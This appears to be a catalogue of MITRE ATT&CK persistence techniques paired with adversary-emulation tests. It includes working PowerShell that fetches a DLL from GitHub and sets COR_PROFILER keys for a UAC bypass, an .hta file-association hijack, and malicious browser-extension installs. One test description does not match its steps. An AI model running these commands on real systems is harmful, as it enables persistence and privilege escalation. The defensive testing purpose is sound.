attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf + description: |- + Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming)  These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel. + + Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges. + name: Boot or Logon Autostart Execution + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1547 + url: https://attack.mitre.org/techniques/T1547 + - external_id: CAPEC-564 + source_name: capec + url: https://capec.mitre.org/data/definitions/564.html + - url: http://msdn.microsoft.com/en-us/library/aa376977 + description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November + 12, 2014. + source_name: Microsoft Run Key + - url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx + description: Microsoft. (n.d.). Authentication Packages. Retrieved March 1, + 2017. + source_name: MSDN Authentication Packages + - url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx + description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018. + source_name: Microsoft TimeProvider + - url: https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order + description: 'Langendorf, S. (2013, September 24). Windows Registry Persistence, + Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018.' + source_name: Cylance Reg Persistence Sept 2013 + - source_name: Linux Kernel Programming + url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf + description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel + Module Programming Guide. Retrieved April 6, 2018. + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. + source_name: TechNet Autoruns + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-04-24T13:50:12.837Z' + created: '2020-01-23T17:46:59.535Z' + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_detection: "Monitor for additions or modifications of mechanisms that + could be used to trigger autostart execution, such as relevant additions to + the Registry. Look for changes that are not correlated with known updates, + patches, or other planned administrative activity. Tools such as Sysinternals + Autoruns may also be used to detect system autostart configuration changes + that could be attempts at persistence.(Citation: TechNet Autoruns) Changes + to some autostart configuration settings may happen under normal conditions + when legitimate software is installed. \n\nSuspicious program execution as + autostart programs may show up as outlier processes that have not been seen + before when compared against historical data.To increase confidence of malicious + activity, data and events should not be viewed in isolation, but as part of + a chain of behavior that could lead to other activities, such as network connections + made for Command and Control, learning details about the environment through + Discovery, and Lateral Movement.\n\nMonitor DLL loads by processes, specifically + looking for DLLs that are not recognized or not normally loaded into a process. + Look for abnormal process behavior that may be due to a process loading a + malicious DLL.\n\nMonitor for abnormal usage of utilities and command-line + parameters involved in kernel modification or driver installation." + x_mitre_permissions_required: + - User + - Administrator + - root + x_mitre_is_subtechnique: false + x_mitre_version: '1.1' + x_mitre_data_sources: + - 'File: File Creation' + - 'Windows Registry: Windows Registry Key Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'File: File Modification' + - 'Command: Command Execution' + - 'Process: Process Creation' + - 'Module: Module Load' + - 'Kernel: Kernel Module Load' + - 'Driver: Driver Load' + - 'Process: OS API Execution' + atomic_tests: [] + T1037: + technique: + id: attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Boot or Logon Initialization Scripts + description: "Adversaries may use scripts automatically executed at boot or + logon initialization to establish persistence. Initialization scripts can + be used to perform administrative functions, which may often execute other + programs or send information to an internal logging server. These scripts + can vary based on operating system and whether applied locally or remotely. + \ \n\nAdversaries may use these scripts to maintain persistence on a single + system. Depending on the access configuration of the logon scripts, either + local credentials or an administrator account may be necessary. \n\nAn adversary + may also be able to escalate their privileges since some boot or logon initialization + scripts run with higher privileges." + external_references: + - source_name: mitre-attack + external_id: T1037 + url: https://attack.mitre.org/techniques/T1037 + - external_id: CAPEC-564 + source_name: capec + url: https://capec.mitre.org/data/definitions/564.html + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-04-27T19:58:02.332Z' + created: '2017-05-31T21:30:38.910Z' + x_mitre_is_subtechnique: false + x_mitre_platforms: + - macOS + - Windows + - Linux + x_mitre_detection: Monitor logon scripts for unusual access by abnormal users + or at abnormal times. Look for files added or modified by unusual accounts + outside of normal administration duties. Monitor running process for actions + that could be indicative of abnormal programs or executables running upon + logon. + x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Creation' + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Active Directory: Active Directory Object Modification' + - 'File: File Creation' + - 'File: File Modification' + x_mitre_version: '2.1' + atomic_tests: [] + T1542.003: + technique: + external_references: + - source_name: mitre-attack + external_id: T1542.003 + url: https://attack.mitre.org/techniques/T1542/003 + - external_id: CAPEC-552 + source_name: capec + url: https://capec.mitre.org/data/definitions/552.html + - source_name: Mandiant M Trends 2016 + url: https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf + description: Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved + March 5, 2019. + - url: http://www.symantec.com/connect/blogs/are-mbr-infections-back-fashion + description: Lau, H. (2011, August 8). Are MBR Infections Back in Fashion? + (Infographic). Retrieved November 13, 2014. + source_name: Lau 2011 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Bootkit + description: |- + Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly. + + A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: Mandiant M Trends 2016) The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011) + + The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code. + id: attack-pattern--1b7b1806-7746-41a1-a35d-e48dae25ddba + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-09-17T19:47:14.338Z' + created: '2019-12-19T21:05:38.123Z' + x_mitre_defense_bypassed: + - Host intrusion prevention systems + - Anti-virus + - File monitoring + x_mitre_version: '1.1' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + - SYSTEM + x_mitre_detection: Perform integrity checking on MBR and VBR. Take snapshots + of MBR and VBR and compare against known good samples. Report changes to MBR + and VBR as they occur for indicators of suspicious activity and further analysis. + x_mitre_data_sources: + - 'Drive: Drive Modification' + x_mitre_platforms: + - Linux + - Windows + atomic_tests: [] + T1176: + technique: + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1176 + url: https://attack.mitre.org/techniques/T1176 + - url: https://en.wikipedia.org/wiki/Browser_extension + description: Wikipedia. (2017, October 8). Browser Extension. Retrieved January + 11, 2018. + source_name: Wikipedia Browser Extension + - url: https://developer.chrome.com/extensions + description: Chrome. (n.d.). What are Extensions?. Retrieved November 16, + 2017. + source_name: Chrome Extensions Definition + - url: https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf + description: Jagpal, N., et al. (2015, August). Trends and Lessons from Three + Years Fighting Malicious Extensions. Retrieved November 17, 2017. + source_name: Malicious Chrome Extension Numbers + - source_name: xorrior chrome extensions macOS + url: https://www.xorrior.com/No-Place-Like-Chrome/ + description: Chris Ross. (2019, February 8). No Place Like Chrome. Retrieved + April 27, 2021. + - url: https://www.ghacks.net/2017/09/19/first-chrome-extension-with-javascript-crypto-miner-detected/ + description: Brinkmann, M. (2017, September 19). First Chrome extension with + JavaScript Crypto Miner detected. Retrieved November 16, 2017. + source_name: Chrome Extension Crypto Miner + - url: https://www.icebrg.io/blog/malicious-chrome-extensions-enable-criminals-to-impact-over-half-a-million-users-and-global-businesses + description: De Tore, M., Warner, J. (2018, January 15). MALICIOUS CHROME + EXTENSIONS ENABLE CRIMINALS TO IMPACT OVER HALF A MILLION USERS AND GLOBAL + BUSINESSES. Retrieved January 17, 2018. + source_name: ICEBRG Chrome Extensions + - url: https://isc.sans.edu/forums/diary/BankerGoogleChromeExtensiontargetingBrazil/22722/ + description: Marinho, R. (n.d.). (Banker(GoogleChromeExtension)).targeting. + Retrieved November 18, 2017. + source_name: Banker Google Chrome Extension Steals Creds + - url: https://isc.sans.edu/forums/diary/CatchAll+Google+Chrome+Malicious+Extension+Steals+All+Posted+Data/22976/https:/threatpost.com/malicious-chrome-extension-steals-data-posted-to-any-website/128680/) + description: Marinho, R. (n.d.). "Catch-All" Google Chrome Malicious Extension + Steals All Posted Data. Retrieved November 16, 2017. + source_name: Catch All Chrome Extension + - url: https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/ + description: 'Vachon, F., Faou, M. (2017, July 20). Stantinko: A massive adware + campaign operating covertly since 2012. Retrieved November 16, 2017.' + source_name: Stantinko Botnet + - url: https://kjaer.io/extension-malware/ + description: 'Kjaer, M. (2016, July 18). Malware in the browser: how you might + get hacked by a Chrome extension. Retrieved November 22, 2017.' + source_name: Chrome Extension C2 Malware + description: |- + Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.(Citation: Wikipedia Browser Extension)(Citation: Chrome Extensions Definition) + + Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners.(Citation: Malicious Chrome Extension Numbers) Depending on the browser, adversaries may also manipulate an extension's update url to install updates from an adversary controlled server or manipulate the mobile configuration file to silently install additional extensions. + + Previous to macOS 11, adversaries could silently install browser extensions via the command line using the profiles tool to install malicious .mobileconfig files. In macOS 11+, the use of the profiles tool can no longer install configuration profiles, however .mobileconfig files can be planted and installed with user interaction.(Citation: xorrior chrome extensions macOS) + + Once the extension is installed, it can browse to websites in the background,(Citation: Chrome Extension Crypto Miner)(Citation: ICEBRG Chrome Extensions) steal all information that a user enters into a browser (including credentials)(Citation: Banker Google Chrome Extension Steals Creds)(Citation: Catch All Chrome Extension) and be used as an installer for a RAT for persistence. + + There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions.(Citation: Stantinko Botnet) There have also been similar examples of extensions being used for command & control.(Citation: Chrome Extension C2 Malware) + name: Browser Extensions + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--389735f1-f21c-4208-b8f0-f8031e7169b8 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-04-27T19:56:54.161Z' + created: '2018-01-16T16:13:52.465Z' + x_mitre_version: '1.2' + x_mitre_contributors: + - Chris Ross @xorrior + - Justin Warner, ICEBRG + x_mitre_data_sources: + - 'Command: Command Execution' + - 'Process: Process Creation' + - 'Network Traffic: Network Connection Creation' + - 'Windows Registry: Windows Registry Key Creation' + - 'File: File Creation' + x_mitre_detection: |- + Inventory and monitor browser extension installations that deviate from normal, expected, and benign extensions. Process and network monitoring can be used to detect browsers communicating with a C2 server. However, this may prove to be a difficult way of initially detecting a malicious extension depending on the nature and volume of the traffic it generates. + + Monitor for any new items written to the Registry or PE files written to disk. That may correlate with browser extension installation. + + On macOS, monitor the command line for usage of the profiles tool, such as profiles install -type=configuration. Additionally, all installed extensions maintain a plist file in the /Library/Managed Preferences/username/ directory. Ensure all listed files are in alignment with approved extensions.(Citation: xorrior chrome extensions macOS) + x_mitre_permissions_required: + - User + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_is_subtechnique: false + identifier: T1176 + atomic_tests: + - name: Chrome (Developer Mode) + auto_generated_guid: 3ecd790d-2617-4abf-9a8c-4e8d47da9ee1 + description: Turn on Chrome developer mode and Load Extension found in the src + directory + supported_platforms: + - linux + - windows + - macos + executor: + steps: | + 1. Navigate to [chrome://extensions](chrome://extensions) and + tick 'Developer Mode'. + + 2. Click 'Load unpacked extension...' and navigate to + [Browser_Extension](../t1176/src/) + + 3. Click 'Select' + name: manual + - name: Chrome (Chrome Web Store) + auto_generated_guid: 4c83940d-8ca5-4bb2-8100-f46dc914bc3f + description: Install the "Minimum Viable Malicious Extension" Chrome extension + supported_platforms: + - linux + - windows + - macos + executor: + steps: | + 1. Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend + in Chrome + + 2. Click 'Add to Chrome' + name: manual + - name: Firefox + auto_generated_guid: cb790029-17e6-4c43-b96f-002ce5f10938 + description: 'Create a file called test.wma, with the duration of 30 seconds + +' + supported_platforms: + - linux + - windows + - macos + executor: + steps: | + 1. Navigate to [about:debugging](about:debugging) and + click "Load Temporary Add-on" + + 2. Navigate to [manifest.json](./src/manifest.json) + + 3. Then click 'Open' + name: manual + - name: Edge Chromium Addon - VPN + auto_generated_guid: 3d456e2b-a7db-4af8-b5b3-720e7c4d9da5 + description: 'Adversaries may use VPN extensions in an attempt to hide traffic + sent from a compromised host. This will install one (of many) available VPNS + in the Edge add-on store. + +' + supported_platforms: + - windows + - macos + executor: + steps: | + 1. Navigate to https://microsoftedge.microsoft.com/addons/detail/fjnehcbecaggobjholekjijaaekbnlgj + in Edge Chromium + + 2. Click 'Get' + name: manual + T1574.012: + technique: + external_references: + - source_name: mitre-attack + external_id: T1574.012 + url: https://attack.mitre.org/techniques/T1574/012 + - source_name: Microsoft Profiling Mar 2017 + url: https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/profiling/profiling-overview + description: Microsoft. (2017, March 30). Profiling Overview. Retrieved June + 24, 2020. + - source_name: Microsoft COR_PROFILER Feb 2013 + url: https://docs.microsoft.com/en-us/previous-versions/dotnet/netframework-4.0/ee471451(v=vs.100) + description: Microsoft. (2013, February 4). Registry-Free Profiler Startup + and Attach. Retrieved June 24, 2020. + - source_name: RedCanary Mockingbird May 2020 + url: https://redcanary.com/blog/blue-mockingbird-cryptominer/ + description: Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved + May 26, 2020. + - source_name: Red Canary COR_PROFILER May 2020 + url: https://redcanary.com/blog/cor_profiler-for-persistence/ + description: Brown, J. (2020, May 7). Detecting COR_PROFILER manipulation + for persistence. Retrieved June 24, 2020. + - source_name: Almond COR_PROFILER Apr 2019 + url: https://offsec.almond.consulting/UAC-bypass-dotnet.html + description: Almond. (2019, April 30). UAC bypass via elevated .NET applications. + Retrieved June 24, 2020. + - source_name: GitHub OmerYa Invisi-Shell + url: https://github.com/OmerYa/Invisi-Shell + description: Yair, O. (2019, August 19). Invisi-Shell. Retrieved June 24, + 2020. + - source_name: subTee .NET Profilers May 2017 + url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html + description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET + Profilers. Retrieved June 24, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: COR_PROFILER + description: |- + Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013) + + The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013) + + Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017) + id: attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-06-26T16:09:58.920Z' + created: '2020-06-24T22:30:55.843Z' + x_mitre_detection: 'For detecting system and user scope abuse of the COR_PROFILER, + monitor the Registry for changes to COR_ENABLE_PROFILING, COR_PROFILER, and + COR_PROFILER_PATH that correspond to system and user environment variables + that do not correlate to known developer tools. Extra scrutiny should be placed + on suspicious modification of these Registry keys by command line tools like + wmic.exe, setx.exe, and [Reg](https://attack.mitre.org/software/S0075), monitoring + for command-line arguments indicating a change to COR_PROFILER variables may + aid in detection. For system, user, and process scope abuse of the COR_PROFILER, + monitor for new suspicious unmanaged profiling DLLs loading into .NET processes + shortly after the CLR causing abnormal process behavior.(Citation: Red Canary + COR_PROFILER May 2020) Consider monitoring for DLL files that are associated + with COR_PROFILER environment variables.' + x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Modification' + - 'Process: Process Creation' + - 'Module: Module Load' + - 'Command: Command Execution' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + - Administrator + x_mitre_contributors: + - Jesse Brown, Red Canary + x_mitre_platforms: + - Windows + identifier: T1574.012 + atomic_tests: + - name: User scope COR_PROFILER + auto_generated_guid: 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a + description: | + Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER). + The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by the Event Viewer process. + Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. + If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however, + the notepad process will not execute with high integrity. + + Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ + supported_platforms: + - windows + input_arguments: + file_name: + description: unmanaged profiler DLL + type: Path + default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll + clsid_guid: + description: custom clsid guid + type: String + default: "{09108e71-974c-4010-89cb-acf471ae9e2c}" + dependency_executor_name: powershell + dependencies: + - description: "#{file_name} must be present\n" + prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" + executor: + command: | + Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan + New-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}\InprocServer32" -Value #{file_name} -Force | Out-Null + New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null + New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null + New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null + Write-Host "executing eventvwr.msc" -ForegroundColor Cyan + START MMC.EXE EVENTVWR.MSC + cleanup_command: "Remove-Item -Path \"HKCU:\\Software\\Classes\\CLSID\\#{clsid_guid}\" + -Recurse -Force -ErrorAction Ignore \nRemove-ItemProperty -Path HKCU:\\Environment + -Name \"COR_ENABLE_PROFILING\" -Force -ErrorAction Ignore | Out-Null\nRemove-ItemProperty + -Path HKCU:\\Environment -Name \"COR_PROFILER\" -Force -ErrorAction Ignore + | Out-Null\nRemove-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER_PATH\" + -Force -ErrorAction Ignore | Out-Null\n" + name: powershell + - name: System Scope COR_PROFILER + auto_generated_guid: f373b482-48c8-4ce4-85ed-d40c8b3f7310 + description: | + Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect. + The unmanaged profiler DLL (T1574.012x64.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity + level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will + still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity. + + Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ + supported_platforms: + - windows + input_arguments: + file_name: + description: unmanaged profiler DLL + type: Path + default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll + clsid_guid: + description: custom clsid guid + type: String + default: "{09108e71-974c-4010-89cb-acf471ae9e2c}" + dependency_executor_name: powershell + dependencies: + - description: "#{file_name} must be present\n" + prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" + executor: + command: | + Write-Host "Creating system environment variables" -ForegroundColor Cyan + New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null + New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null + New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null + cleanup_command: | + Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -Force -ErrorAction Ignore | Out-Null + Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -Force -ErrorAction Ignore | Out-Null + Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -Force -ErrorAction Ignore | Out-Null + name: powershell + elevation_required: true + - name: Registry-free process scope COR_PROFILER + auto_generated_guid: 79d57242-bbef-41db-b301-9d01d9f6e817 + description: | + Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making changes to the registry. The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by PowerShell. + + Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ + supported_platforms: + - windows + input_arguments: + file_name: + description: unamanged profiler DLL + type: Path + default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll + clsid_guid: + description: custom clsid guid + type: String + default: "{09108e71-974c-4010-89cb-acf471ae9e2c}" + dependency_executor_name: powershell + dependencies: + - description: "#{file_name} must be present\n" + prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" + executor: + command: | + $env:COR_ENABLE_PROFILING = 1 + $env:COR_PROFILER = '#{clsid_guid}' + $env:COR_PROFILER_PATH = '#{file_name}' + POWERSHELL -c 'Start-Sleep 1' + cleanup_command: | + $env:COR_ENABLE_PROFILING = 0 + $env:COR_PROFILER = '' + $env:COR_PROFILER_PATH = '' + name: powershell + T1546.001: + technique: + created: '2020-01-24T13:40:47.282Z' + modified: '2020-01-24T13:40:47.282Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + type: attack-pattern + id: attack-pattern--98034fef-d9fb-4667-8dc4-2eab6231724c + description: "Adversaries may establish persistence by executing malicious content + triggered by a file type association. When a file is opened, the default program + used to open the file (also called the file association or handler) is checked. + File association selections are stored in the Windows Registry and can be + edited by users, administrators, or programs that have Registry access (Citation: + Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or + by administrators using the built-in assoc utility. (Citation: Microsoft Assoc + Oct 2017) Applications can modify the file association for a given file extension + to call an arbitrary program when a file with the given extension is opened.\n\nSystem + file associations are listed under HKEY_CLASSES_ROOT\\.[extension], + for example HKEY_CLASSES_ROOT\\.txt. The entries point to a handler + for that extension located at HKEY_CLASSES_ROOT\\[handler]. The + various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\\[handler]\\shell\\[action]\\command. + For example: \n* HKEY_CLASSES_ROOT\\txtfile\\shell\\open\\command\n* + HKEY_CLASSES_ROOT\\txtfile\\shell\\print\\command\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\printto\\command\n\nThe + values of the keys listed are commands that are executed when the handler + opens the file extension. Adversaries can modify these values to continually + execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012)" + name: Change Default File Association + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1546.001 + url: https://attack.mitre.org/techniques/T1546/001 + - external_id: CAPEC-556 + source_name: capec + url: https://capec.mitre.org/data/definitions/556.html + - url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs + description: Microsoft. (n.d.). Change which programs Windows 7 uses by default. + Retrieved July 26, 2016. + source_name: Microsoft Change Default Programs + - url: http://msdn.microsoft.com/en-us/library/bb166549.aspx + description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions. + Retrieved November 13, 2014. + source_name: Microsoft File Handlers + - url: https://docs.microsoft.com/windows-server/administration/windows-commands/assoc + description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August + 7, 2018. + source_name: Microsoft Assoc Oct 2017 + - url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd + description: Sioting, S. (2012, October 8). TROJ_FAKEAV.GZD. Retrieved August + 8, 2018. + source_name: TrendMicro TROJ-FAKEAV OCT 2012 + x_mitre_platforms: + - Windows + x_mitre_contributors: + - Travis Smith, Tripwire + - Stefan Kanthak + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Command: Command Execution' + x_mitre_detection: |- + Collect and analyze changes to Registry keys that associate file extensions to default applications for execution and correlate with unknown process launch activity or unusual file types for that process. + + User file association preferences are stored under [HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts and override associations configured under [HKEY_CLASSES_ROOT]. Changes to a user's preference will occur under this entry's subkeys. + + Also look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques. + x_mitre_permissions_required: + - Administrator + - SYSTEM + - User + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + identifier: T1546.001 + atomic_tests: + - name: Change Default File Association + auto_generated_guid: 10a08978-2045-4d62-8c42-1957bbbea102 + description: "Change Default File Association From cmd.exe of hta to notepad.\n\nUpon + successful execution, cmd.exe will change the file association of .hta to + notepad.exe. \n" + supported_platforms: + - windows + input_arguments: + target_extension_handler: + description: txtfile maps to notepad.exe + type: Path + default: txtfile + extension_to_change: + description: File Extension To Hijack + type: String + default: ".hta" + original_extension_handler: + description: File Extension To Revert + type: String + default: htafile + executor: + command: 'assoc #{extension_to_change}=#{target_extension_handler} + +' + cleanup_command: 'assoc #{extension_to_change}=#{original_extension_handler} + +' + name: command_prompt + elevation_required: true + T1136.003: + technique: + external_references: + - source_name: mitre-attack + external_id: T1136.003 + url: https://attack.mitre.org/techniques/T1136/003 + - source_name: Microsoft O365 Admin Roles + url: https://docs.microsoft.com/en-us/office365/admin/add-users/about-admin-roles?view=o365-worldwide + description: Ako-Adjei, K., Dickhaus, M., Baumgartner, P., Faigel, D., et. + al.. 